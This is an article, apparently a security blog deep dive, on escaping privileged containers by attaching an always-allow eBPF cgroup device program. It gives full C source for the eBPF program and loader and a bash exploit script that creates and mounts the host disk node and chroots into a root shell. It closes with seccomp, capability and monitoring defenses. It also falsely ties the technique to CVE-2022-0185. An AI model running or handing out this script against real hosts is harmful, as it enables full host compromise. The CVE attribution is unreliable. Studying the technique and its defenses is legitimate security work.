Escaping Containers with eBPF: A Cloud-Native Security Deep Dive

Background

With the widespread adoption of cloud-native technologies, container security has become a critical area of focus. eBPF (extended Berkeley Packet Filter) runs sandboxed programs inside the Linux kernel and provides unprecedented observability and control, but it also introduces new attack surfaces. This article explores how eBPF can be abused to escape a container, inspired by the vulnerability CVE-2022-0185.

Principle of Container Escape

The core of this container escape technique lies in abusing eBPF programs of the BPF_PROG_TYPE_CGROUP_DEVICE type. This type of program is designed to be attached to a cgroup (control group) to filter device access from processes within that cgroup.
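To make the filtering decision concrete, here is a minimal userspace model of what a restrictive device filter decides. It is a sketch, not a loadable eBPF program: struct dev_ctx is a local stand-in for the kernel's struct bpf_cgroup_dev_ctx, the constants are copied from the UAPI header, and the allowlist itself is a hypothetical example.

```c
#include <stdint.h>

/* Local mirror of the fields the kernel hands to a cgroup device program
 * (struct bpf_cgroup_dev_ctx in <linux/bpf.h>). */
struct dev_ctx {
    uint32_t access_type; /* (access bits << 16) | device type */
    uint32_t major;
    uint32_t minor;
};

/* Values copied from the kernel UAPI (BPF_DEVCG_DEV_* and BPF_DEVCG_ACC_*). */
enum { DEV_BLOCK = 1, DEV_CHAR = 2 };
enum { ACC_MKNOD = 1, ACC_READ = 2, ACC_WRITE = 4 };

/* Build an access_type value using the kernel's encoding. */
uint32_t make_access_type(uint32_t access, uint32_t dev_type) {
    return (access << 16) | dev_type;
}

/* Hypothetical allowlist: permit a few harmless character devices,
 * deny everything else. Returns 1 to allow and 0 to deny, which is the
 * convention cgroup device programs use. */
int device_filter(const struct dev_ctx *ctx) {
    uint32_t dev_type = ctx->access_type & 0xFFFF; /* low 16 bits */

    if (dev_type != DEV_CHAR)
        return 0; /* every block device is denied, including 8:1 */
    if (ctx->major == 1 &&
        (ctx->minor == 3 || ctx->minor == 5 ||
         ctx->minor == 8 || ctx->minor == 9))
        return 1; /* /dev/null, /dev/zero, /dev/random, /dev/urandom */
    return 0;     /* default deny */
}
```

Under this model a mknod request for block device 8:1 is rejected, while a read of /dev/null (character device 1:3) is allowed. A filter that returns 1 unconditionally removes exactly this distinction.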

The workflow is as follows:

  1. Loading and Attaching the BPF Program: An attacker with the CAP_BPF capability (granted in privileged containers) can load a custom eBPF program into the kernel.
  2. Bypassing Device Access Control: The attacker crafts an eBPF program that always returns 1 (allow access), effectively disabling the cgroup's device access control mechanism.
  3. Creating Host Device Nodes: With the device filter bypassed, the attacker can use the mknod system call inside the container to create a device node that corresponds to a host device, for example /dev/sda1 (the first partition of the host's first disk).
  4. Mounting the Host Device and Getting a Shell: The attacker then mounts this newly created device node on a directory within the container. If this device holds the host's root filesystem, the attacker gains read and write access to the entire host filesystem, leading to a complete container escape and host compromise.

Constructing the PoC

To execute this attack, we need to meet the following prerequisites:

  • Possession of the CAP_SYS_ADMIN and CAP_BPF capabilities. CAP_SYS_ADMIN is required for mounting, while CAP_BPF is needed to load and attach eBPF programs. Both are available in privileged containers. Creating the device node additionally requires CAP_MKNOD, which Docker grants to containers by default.
  • The ability to access the root directory of the container’s cgroup, which is necessary for attaching the eBPF program.
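Whether a given container meets the capability prerequisites can be read from the CapEff field of /proc/self/status. The following sketch decodes that bitmask. The helper names are hypothetical, and the capability numbers are copied from <linux/capability.h>.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Capability bit positions from <linux/capability.h>. */
#define CAP_NUM_SYS_ADMIN 21
#define CAP_NUM_MKNOD     27
#define CAP_NUM_BPF       39

/* Extract the effective capability mask from the text of /proc/<pid>/status.
 * Returns 0 on success, -1 if the CapEff field is missing. */
int parse_cap_eff(const char *status_text, uint64_t *mask) {
    const char *field = strstr(status_text, "CapEff:");
    if (field == NULL)
        return -1;
    /* strtoull skips the tab that separates the label from the hex value. */
    *mask = strtoull(field + strlen("CapEff:"), NULL, 16);
    return 0;
}

/* Return 1 if capability number `cap` is set in `mask`, else 0. */
int has_cap(uint64_t mask, int cap) {
    return (int)((mask >> cap) & 1);
}

/* Print whether the current process holds the three relevant capabilities. */
int report_self_caps(void) {
    char buf[8192];
    uint64_t mask;
    FILE *f = fopen("/proc/self/status", "r");
    if (f == NULL)
        return -1;
    size_t n = fread(buf, 1, sizeof(buf) - 1, f);
    fclose(f);
    buf[n] = '\0';
    if (parse_cap_eff(buf, &mask) != 0)
        return -1;
    printf("CAP_SYS_ADMIN=%d CAP_MKNOD=%d CAP_BPF=%d\n",
           has_cap(mask, CAP_NUM_SYS_ADMIN),
           has_cap(mask, CAP_NUM_MKNOD),
           has_cap(mask, CAP_NUM_BPF));
    return 0;
}
```

For the mask 00000000a80425fb, which is what a Docker container started with default settings typically shows, CAP_MKNOD is set but CAP_SYS_ADMIN and CAP_BPF are not, so the prerequisites above are not met.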

Below are the core code snippets for the Proof of Concept (PoC).

1. eBPF Program (bpf_prog.c)

This program is very simple. It contains a single function, bpf_allow_device_access, which always returns 1. For a cgroup device program, a return value of 1 allows the access and 0 denies it, so this program permits any device access.

    #include <linux/bpf.h>
    #include <bpf/bpf_helpers.h>  // libbpf header that provides SEC()

    SEC("cgroup/dev")
    int bpf_allow_device_access(struct bpf_cgroup_dev_ctx *ctx) {
        // Always allow access
        return 1;
    }

    char _license[] SEC("license") = "GPL";

2. User-space Loader Program (loader.c)

This program is responsible for loading the eBPF program into the kernel and attaching it to the cgroup.

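    #include <stdio.h>
    #include <fcntl.h>
    #include <unistd.h>
    #include <bpf/bpf.h>
    #include <bpf/libbpf.h>

    int main(int argc, char **argv) {
        if (argc != 3) {
            fprintf(stderr, "Usage: %s <bpf_object_file> <cgroup_path>\n", argv[0]);
            return 1;
        }

        const char *bpf_file = argv[1];
        const char *cgroup_path = argv[2];

        struct bpf_object *obj;
        struct bpf_program *prog;
        int prog_fd, cgroup_fd;

        // Parse the compiled ELF object (libbpf 1.0+ returns NULL on failure)
        obj = bpf_object__open_file(bpf_file, NULL);
        if (!obj) {
            perror("bpf_object__open_file");
            return 1;
        }

        // Load the program into the kernel; the verifier runs at this point
        if (bpf_object__load(obj)) {
            perror("bpf_object__load");
            return 1;
        }

        prog = bpf_object__find_program_by_name(obj, "bpf_allow_device_access");
        if (!prog) {
            fprintf(stderr, "program not found in %s\n", bpf_file);
            return 1;
        }
        prog_fd = bpf_program__fd(prog);

        // A cgroup is referenced by a file descriptor for its directory
        cgroup_fd = open(cgroup_path, O_RDONLY);
        if (cgroup_fd < 0) {
            perror("open cgroup");
            return 1;
        }

        if (bpf_prog_attach(prog_fd, cgroup_fd, BPF_CGROUP_DEVICE, 0)) {
            perror("bpf_prog_attach");
            return 1;
        }

        printf("eBPF program attached successfully!\n");
        close(cgroup_fd);
        bpf_object__close(obj);
        return 0;
    }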

3. Attack Script (exploit.sh)

This script automates the entire attack process.

    #!/bin/bash

    # 1. Compile the eBPF program and the loader
    clang -O2 -target bpf -c bpf_prog.c -o bpf_prog.o
    clang loader.c -lbpf -o loader

    # 2. Run the loader to attach the eBPF program to the cgroup root
    # The cgroup path might differ based on the system
    CGROUP_PATH=/sys/fs/cgroup/unified
    ./loader bpf_prog.o "$CGROUP_PATH"

    # 3. Create a device node for the host's primary disk
    mknod /tmp/host_disk b 8 1

    # 4. Mount the host disk
    mkdir /tmp/host_fs
    mount /tmp/host_disk /tmp/host_fs

    # 5. Get a root shell on the host
    chroot /tmp/host_fs /bin/bash

PoC Code Analysis

  • bpf_prog.c: The SEC("cgroup/dev") annotation places the function in an ELF section whose name libbpf uses to infer the program type (BPF_PROG_TYPE_CGROUP_DEVICE). At attach time the kernel checks that the program type matches the hook point.
  • loader.c: First, it opens the compiled object with bpf_object__open_file and loads it into the kernel with bpf_object__load. Then, it opens the cgroup path (e.g., /sys/fs/cgroup/unified) and uses bpf_prog_attach to attach the program to the BPF_CGROUP_DEVICE hook.
  • exploit.sh: The script begins by compiling the C code. It then executes the loader to attach the eBPF program. The mknod command creates a block device file named host_disk with major number 8 and minor number 1, which typically corresponds to /dev/sda1 on the host. Finally, it mounts this device and uses chroot to start a root shell inside the host's filesystem.

Defense and Detection

To defend against and detect this type of eBPF-based container escape, consider the following measures:

  1. Principle of Least Privilege: Avoid running containers with unnecessary capabilities, especially CAP_BPF and CAP_SYS_ADMIN. Do not run containers in privileged mode unless absolutely necessary.
  2. Seccomp/AppArmor: Use a seccomp profile to restrict system calls. Specifically, you can block the bpf(), mknod() and mknodat() system calls for containers that do not need them. An AppArmor profile can additionally deny mount operations and capabilities.
  3. Monitor eBPF Program Loading: Use kernel auditing or security tools like Falco or Tetragon to monitor the loading of new eBPF programs, especially those of type BPF_PROG_TYPE_CGROUP_DEVICE. Alert on suspicious activity.
  4. Kernel Version: Keep the host kernel updated. While this specific technique abuses a feature rather than a bug, newer kernels may introduce stricter checks or mechanisms to mitigate such abuse.

Conclusion

eBPF is a double-edged sword. While it provides powerful capabilities for system observability and networking, it also introduces potent new attack vectors. This container escape method demonstrates how a feature designed for security (cgroup device filtering) can be subverted to compromise the host. For cloud-native environments, it is crucial to adopt a defense-in-depth strategy, combining strict permission management, runtime security monitoring, and proactive vulnerability management to ensure container and host security.
